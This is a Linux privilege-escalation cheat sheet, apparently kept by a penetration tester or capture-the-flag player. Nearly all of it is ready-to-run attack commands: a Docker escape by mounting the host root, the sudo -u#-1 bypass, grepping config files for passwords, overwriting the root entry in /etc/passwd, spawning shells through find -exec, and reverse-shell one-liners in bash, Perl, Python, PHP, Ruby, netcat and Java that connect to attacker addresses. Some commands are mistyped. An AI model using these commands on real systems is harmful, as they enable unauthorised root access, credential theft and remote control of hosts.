==============================================================================
[+] Identify Dockers
==============================================================================
# Identyfy Dockers
ls -a /.dockerenv

# root whit docker
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

==============================================================================
[+] List users with bash permisson
==============================================================================
cat /etc/passwd | grep bash

==============================================================================
[+] Sudo search Permissions
==============================================================================
sudo -l
sudo -i 
# Search sudo Permissions 
https://gtfobins.github.io/

# (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash

==============================================================================
[+] Search Passwords on Config Files
==============================================================================

find \ -name  *config*.php | xargs cat | grep  -i - E "pass"

==============================================================================
[+] Timers Process
==============================================================================
systemctl list-timers
systemctl list-timers --all

==============================================================================
[+] Version Linux to Exploit
==============================================================================

uname -a 
lsb_release

==============================================================================
[+] Directories with Permissions
==============================================================================
 /tmp
 /dev/shm
 
==============================================================================
[+] Edit /etc/passwd or /etc/shadows
==============================================================================
# Change root value /etc/passwd 
root:1231231321:0:0:root:/root:/bin/bash

==============================================================================
[+] Hidden Scripts 
==============================================================================
 echo $PATH 
 file /usr/bin/* | grep -i -E -v "ELF|POSIX|symbolic|perl"
 
 ==============================================================================
[+] find
==============================================================================
 
touch alex
find alex -exec "whoami" \;
find . -exec /bin/sh \; -quit    
 
==============================================================================
[+] Local Remote Shells
==============================================================================

# Import tty shell
python3 -c 'import pty;pty.spawn("/bin/bash");'
python -c 'import pty;pty.spawn("/bin/bash");'
ctrl + z
stty raw -echo

# Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

# Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python 2.7 / Linux 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

# Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Netcat
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
 
# Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/1.2.3.4/9090;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

# xterm
xterm -display 10.0.0.1:1
xhost +10.10.10.10





